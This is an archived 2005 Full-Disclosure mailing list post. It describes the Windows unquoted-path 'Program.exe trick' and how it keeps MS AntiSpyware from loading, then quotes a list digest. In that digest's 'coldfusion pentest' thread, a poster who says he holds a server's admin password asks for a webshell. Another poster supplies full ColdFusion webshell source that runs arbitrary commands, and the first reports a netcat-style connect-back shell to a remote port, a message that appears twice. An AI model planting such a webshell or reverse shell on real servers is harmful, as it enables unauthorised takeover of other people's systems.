[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
RE: [Full-disclosure] Useless tidbit (MS AntiSpyware)
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: RE: [Full-disclosure] Useless tidbit (MS AntiSpyware)
- From: Steven Rakick <stevenrakick@xxxxxxxxx>
- Date: Tue, 10 May 2005 07:30:03 -0700 (PDT)
Interesting. Has this always been that way? While it's not a huge gaping hole,
it's definitely concerning. At least to me.
Steve
-----Original Message-----
From: full-disclosure-bounces@xxxxxxxxxxxxxxxxx
[mailto:full-disclosure-bounces@xxxxxxxxxxxxxxxxx] On Behalf Of pretty vacant
Sent: Tuesday, May 10, 2005 9:53 AM
To: James Tucker
Cc: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: Re: [Full-disclosure] Useless tidbit
You may or may not know that Windows applications often use the registry to
store information about where to find applications within their file system.
Due to the way in which Windows handles filenames, situations where this
information is stored in an unquoted fashion, can leave the application open to
an attack commonly referred to as the "Program.exe trick".
As you know, it's quite common to have files and/or directories with spaces in
the name (e.g. C:\Program Files). Windows is unique in that it essentially
doesn't exactly know what it's doing if the command isn't quoted and contains
spaces. For example look at the following command:
c:\program files\windows media player\wmplayer
If unquoted, Windows tries the following:
1st try
Execute: c:\program.exe
Arg1: files\windows
Arg2: media
Arg3: player\wmplayer
2nd try
Execute: "c:\program files\windows.exe"
Arg1: media
Arg2: player\wmplayer
3rd try
Execute: "c:\program files\windows media"
Arg1: player\wmplayer
4th try
Execute: "c:\program files\windows media player\mwplayer.exe"
Well in the case of MS AntiSpyware (and hundreds of other applications),
AntiSpyware, it starts up by executing "AntiSpywareMain.exe" which in turn
displays a nice splash screen, performs some other misc activities before
calling the gsasDtServ.exe. The problem is that the execution of gsasDtServ.exe
is unquoted, while the app tries to execute c:\program files\microsoft
antispyware\gsasDtServ.exe, if c:\program.exe exists, it will be executed
instead and MS Antispyware never actually gets loaded.
With XPSP2, the OS will actually warn you about files like c:\Program.bat, or
c:\Program.exe, but not of c:\program files\internet.exe.
Sadly, this isn't uncommon and when I tested this on my system the first time,
7 applications were executed over a 48 hour period. Try it for yourself. My
Program.exe logs the executing user and command args to c:\program.log.
On Tue, 10 May 2005, James Tucker wrote:
> It appears this was a "trick" that I missed, can you provide more info?
>
> thanks.
>
> On 5/9/05, pretty vacant <optimist@xxxxxxxxxxxxxxx> wrote:
> > Interesting tidbit. The old c:\program.exe trick prevents MS
> > Anti-Spyware from loading at login. :)
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
full-disclosure-request@xxxxxxxxxxxxxxxxx wrote:Send Full-Disclosure mailing
list submissions to
full-disclosure@xxxxxxxxxxxxxxxxx
To subscribe or unsubscribe via the World Wide Web, visit
https://lists.grok.org.uk/mailman/listinfo/full-disclosure
or, via email, send a message with subject or body 'help' to
full-disclosure-request@xxxxxxxxxxxxxxxxx
You can reach the person managing the list at
full-disclosure-owner@xxxxxxxxxxxxxxxxx
When replying, please edit your Subject line so it is more specific
than "Re: Contents of Full-Disclosure digest..."
Note to digest recipients - when replying to digest posts, please trim your
post appropriately. Thank you.
Today's Topics:
1. List Charter (John Cartwright)
2. Re: Fwd: GWAVA Sender Notification (Content filter) (James Tucker)
3. Re: coldfusion pentest (fatb)
4. Re: coldfusion pentest (fatb)
----------------------------------------------------------------------
Message: 1
Date: Tue, 10 May 2005 10:02:23 +0100
From: John Cartwright
Subject: [Full-disclosure] List Charter
To: full-disclosure@xxxxxxxxxxxxxxxxx
Message-ID: <20050510090223.GA21817@xxxxxxxxxxx>
Content-Type: text/plain; charset=us-ascii
Hi
FYI: I have disabled monthly password reminders due to the increasing
problem of archive sites storing them verbatim without filtering.
Anyone running such an archive is encouraged to change their password
if necessary.
A password reminder is always available via the web interface in any
case. Additionally I have moved to more secure random passwords for
new members.
Cheers
- John
[Full-Disclosure] Mailing List Charter
John Cartwright
- Introduction & Purpose -
This document serves as a charter for the [Full-Disclosure] mailing
list hosted at lists.grok.org.uk.
The list was created on 9th July 2002 by Len Rose, and is primarily
concerned with security issues and their discussion. The list is
administered by John Cartwright.
The Full-Disclosure list is hosted and sponsored by Secunia.
- Subscription Information -
Subscription/unsubscription may be performed via the HTTP interface
located at http://lists.grok.org.uk/mailman/listinfo/full-disclosure.
Alternatively, commands may be emailed to
full-disclosure-request@xxxxxxxxxxxxxxxxx, send the word 'help' in
either the message subject or body for details.
- Moderation & Management -
The [Full-Disclosure] list is unmoderated. Typically posting will be
restricted to members only, however the administrators may choose to
accept submissions from non-members based on individual merit and
relevance.
It is expected that the list will be largely self-policing, however in
special circumstances (eg spamming, misappropriation) then offending
members may be removed from the list by the management.
An archive of postings is available at
http://lists.grok.org.uk/pipermail/full-disclosure/.
- Acceptable Content -
Any information pertaining to vulnerabilities is acceptable, for
instance announcement and discussion thereof, exploit techniques and
code, related tools and papers, and other useful information.
Gratuitous advertisement, product placement, or self-promotion is
forbidden. Disagreements, flames, arguments, and off-topic discussion
should be taken off-list wherever possible.
Humour is acceptable in moderation, providing it is inoffensive.
Politics should be avoided at all costs.
Members are reminded that due to the open nature of the list, they
should use discretion in executing any tools or code distributed via
this list.
- Posting Guidelines -
The primary language of this list is English. Members are expected to
maintain a reasonable standard of netiquette when posting to the list.
Quoting should not exceed that which is necessary to convey context,
this is especially relevant to members subscribed to the digested
version of the list.
The use of HTML is discouraged, but not forbidden. Signatures will
preferably be short and to the point, and those containing
'disclaimers' should be avoided where possible.
Attachments may be included if relevant or necessary (e.g. PGP or
S/MIME signatures, proof-of-concept code, etc) but must not be active
(in the case of a worm, for example) or malicious to the recipient.
Vacation messages should be carefully configured to avoid replying to
list postings. Offenders will be excluded from the mailing list until
the problem is corrected.
Members may post to the list by emailing
full-disclosure@xxxxxxxxxxxxxxxxxx Do not send subscription/
unsubscription mails to this address, use the -request address
mentioned above.
- Charter Additions/Changes -
The list charter will be published at
http://lists.grok.org.uk/full-disclosure-charter.html.
In addition, the charter will be posted monthly to the list by the
management.
Alterations will be made after consultation with list members and a
concensus has been reached.
------------------------------
Message: 2
Date: Tue, 10 May 2005 10:11:56 +0100
From: James Tucker
Subject: Re: [Full-disclosure] Fwd: GWAVA Sender Notification (Content
filter)
To: "Valdis.Kletnieks@xxxxxx"
Cc: full-disclosure@xxxxxxxxxxxxxxxxx
Message-ID:
Content-Type: text/plain; charset=ISO-8859-1
marketing is a "wonderful" thing.
On 5/10/05, Valdis.Kletnieks@xxxxxx wrote:
> On Tue, 10 May 2005 02:32:41 BST, James Tucker said:
> > Surely this kind of message is a really bad idea.
>
> You know it, I know it, and the A/V vendors know it.
>
> > What is the possible true business value of such a filter?
>
> The true business value is for the A/V vendor, who can blat out a
> free spam to the forged MAIL FROM: address (which is probably scraped off
> a disk by the worm/virus and therefor likely an actual address.
>
> In this case, the bozos at GWAVA can spam you about finding something they
> didn't consider acceptable.
>
> > What is the potential impact upon security to disclose the information
> > that this mail does?
>
> It demonstrates that the site running it is lame enough to still be running
> A/V software that spams people.
>
> > What is the cost of deployment of this system against the costs
> > related to it's potential, and actual effects?
>
> The GWAVA people don't care. They've been paid for the product already, and
> they're not the ones paying for the bandwidth.
>
> Remember - you're talking here about a market segment *founded* on the
> business
> model that *partially* patching some other vendor's broken software will lead
> to a permanent gravy train. Once you've wrapped your brain around the morals
> and ethics of that business model, it's obviously a very tiny step to spamming
> other people about the wonders of the product.
>
>
>
------------------------------
Message: 3
Date: Tue, 10 May 2005 17:12:00 +0800
From: "fatb"
Subject: Re: [Full-disclosure] coldfusion pentest
To: "Javier Reoyo"
Cc: full-disclosure@xxxxxxxxxxxxxxxxx
Message-ID: <007001c55540$cdd9d440$3801a8c0@bill>
Content-Type: text/plain; charset="gb2312"
thx :)
the script from securiteam was from Kurt Grutzmacher originally,it could not
run in my box
and Im successful got a working shell by uploading a nc like tool and use the
following script to run it
arguments="-connect 1.1.1. 9999"
timeout="20">
no matter how,I thought many guys who like me need a working cf
webshell,because the upload script do not allow us to upload exe or some other
kinds of files
----- Original Message -----
From: "Javier Reoyo"
To:
Sent: Tuesday, May 10, 2005 4:31 PM
Subject: Re: [Full-disclosure] coldfusion pentest
> Hi fatb,
>
>
> this is from mailing of securiteam. Try it.
>
> ColdFusion Web Shell
> ------------------------------------------------------------------------
>
>
> SUMMARY
>
>
>
> DETAILS
>
> The following source code will generate a web based shell whenever it is
> executed under the ColdFusion environment.
>
> Tool source code:
> < html>
> < body>
>
> < cfoutput>
> < table>
> < form method="POST" action="cfexec.cfm">
> < tr>
> < td>Command:
> < td> < input type=text name="cmd" size=50< cfif isdefined("form.cmd")>
> value="#form.cmd#" > < br>
>
> < tr>
> < td>Options:
> < td> < input type=text name="opts" size=50 < cfif
> isdefined("form.opts")> value="#form.opts#" >< br>
>
> < tr>
> < td>Timeout:
> < td>< input type=text name="timeout" size=4 < cfif
> isdefined("form.timeout")> value="#form.timeout#" < cfelse> value="5"
> >
>
>
> < input type=submit value="Exec" >
>
>
> < cfsavecontent variable="myVar">
> < cfexecute name = "#Form.cmd#" arguments = "#Form.opts#" timeout =
> "#Form.timeout#">
>
>
> < pre>
> #myVar#
>
>
>
>
>
>
> ADDITIONAL INFORMATION
>
> The information has been provided by Kurt
> Grutzmacher.
>
>
>
> ========================================
>
> ----- Original Message -----
> From: "fatb"
> To:
> Cc:
> Sent: Tuesday, May 10, 2005 4:43 AM
> Subject: [Full-disclosure] coldfusion pentest
>
>
>> Hi all guys
>>
>> I've successed get the admin's passwd of the web interface
>>
>> and I can upload any kinds of files to the server
>>
>> the server is running coldfusion 4.5 with iis 5.0
>>
>> but I can not find a coldfusion webshell to continue
>>
>> anybody could be kind enough to send me a working coldfusion webshell
>>
>> thx in advanced!
>
>
> ----------------------------------------------------------------------------
> ----
>
>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
------------------------------
Message: 4
Date: Tue, 10 May 2005 17:19:59 +0800
From: "fatb"
Subject: Re: [Full-disclosure] coldfusion pentest
To: "Javier Reoyo"
Cc: full-disclosure@xxxxxxxxxxxxxxxxx
Message-ID: <007901c55541$7e11ad10$3801a8c0@bill>
Content-Type: text/plain; charset="gb2312"
thx :)
the script from securiteam was from Kurt Grutzmacher originally,it could not
run in my box
and Im successful got a working shell by uploading a nc like tool and use the
following script to run it
arguments="-connect 1.1.1. 9999"
timeout="20">
no matter how,I thought many guys who like me need a working cf
webshell,because the upload script do not allow us to upload exe or some other
kinds of files
----- Original Message -----
From: "Javier Reoyo"
To:
Sent: Tuesday, May 10, 2005 4:31 PM
Subject: Re: [Full-disclosure] coldfusion pentest
> Hi fatb,
>
>
> this is from mailing of securiteam. Try it.
>
> ColdFusion Web Shell
> ------------------------------------------------------------------------
>
>
> SUMMARY
>
>
>
> DETAILS
>
> The following source code will generate a web based shell whenever it is
> executed under the ColdFusion environment.
>
> Tool source code:
> < html>
> < body>
>
> < cfoutput>
> < table>
> < form method="POST" action="cfexec.cfm">
> < tr>
> < td>Command:
> < td> < input type=text name="cmd" size=50< cfif isdefined("form.cmd")>
> value="#form.cmd#" > < br>
>
> < tr>
> < td>Options:
> < td> < input type=text name="opts" size=50 < cfif
> isdefined("form.opts")> value="#form.opts#" >< br>
>
> < tr>
> < td>Timeout:
> < td>< input type=text name="timeout" size=4 < cfif
> isdefined("form.timeout")> value="#form.timeout#" < cfelse> value="5"
> >
>
>
> < input type=submit value="Exec" >
>
>
> < cfsavecontent variable="myVar">
> < cfexecute name = "#Form.cmd#" arguments = "#Form.opts#" timeout =
> "#Form.timeout#">
>
>
> < pre>
> #myVar#
>
>
>
>
>
>
> ADDITIONAL INFORMATION
>
> The information has been provided by Kurt
> Grutzmacher.
>
>
>
> ========================================
>
> ----- Original Message -----
> From: "fatb"
> To:
> Cc:
> Sent: Tuesday, May 10, 2005 4:43 AM
> Subject: [Full-disclosure] coldfusion pentest
>
>
>> Hi all guys
>>
>> I've successed get the admin's passwd of the web interface
>>
>> and I can upload any kinds of files to the server
>>
>> the server is running coldfusion 4.5 with iis 5.0
>>
>> but I can not find a coldfusion webshell to continue
>>
>> anybody could be kind enough to send me a working coldfusion webshell
>>
>> thx in advanced!
>
>
> ----------------------------------------------------------------------------
> ----
>
>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
------------------------------
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
End of Full-Disclosure Digest, Vol 3, Issue 18
**********************************************
---------------------------------
Discover Yahoo!
Use Yahoo! to plan a weekend, have fun online & more. Check it out!_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/